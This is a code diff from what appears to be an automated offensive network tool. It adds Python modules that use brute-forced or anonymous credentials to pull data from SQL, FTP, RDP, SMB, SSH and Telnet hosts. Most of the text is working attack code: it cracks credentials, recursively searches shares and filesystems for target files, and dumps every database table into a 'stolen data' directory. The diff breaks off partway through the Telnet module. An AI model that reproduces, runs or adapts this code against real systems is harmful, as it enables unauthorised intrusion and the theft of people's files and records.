with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait() # non-blocking drain: a worker may grab the last item first
except Empty:
break
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

189
actions/steal_data_sql.py Normal file

@@ -0,0 +1,189 @@
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
try:
# If no database is specified, connect without selecting one
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
except Exception as e:
logger.error(f"Error finding tables: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
try:
if 'success' in self.b_parent_action(row): # Check whether the parent SQLBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filter the credentials for this specific IP
ip_credentials = df[df['IP Address'] == ip]
# Build (username, password, database) tuples
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout)
timer.start()
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# Connect without a database first to check global permissions
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Connect to the specific database for the data theft
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row (keyed by the parent action name).
"""
return str(row.get(b_parent, '')) # row is assumed to be a flat mapping of action names to status strings
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

198
actions/steal_files_ftp.py Normal file

@@ -0,0 +1,198 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
"""
Establish an FTP connection.
"""
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
try:
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
try:
if 'success' in str(row.get(b_parent, '')): # Verify that the parent FTPBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

184
actions/steal_files_rdp.py Normal file

@@ -0,0 +1,184 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in str(row.get(b_parent, '')): # Verify that the parent RDPBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

223
actions/steal_files_smb.py Normal file

@@ -0,0 +1,223 @@
import os
import logging
from rich.console import Console
from threading import Timer
import time
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
"""
Establish an SMB connection.
"""
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
self.smb_connected = True
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
except Exception as e:
logger.error(f"Error listing shares: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
try:
if 'success' in str(row.get(b_parent, '')): # Verify that the parent SMBBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access()[0]: # test the connection element: the (None, None) tuple itself is always truthy
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

173
actions/steal_files_ssh.py Normal file

@@ -0,0 +1,173 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import paramiko
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using SSH.
"""
try:
if 'success' in str(row.get(b_parent, '')): # Verify that the parent SSHBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

180
actions/steal_files_telnet.py Normal file

@@ -0,0 +1,180 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
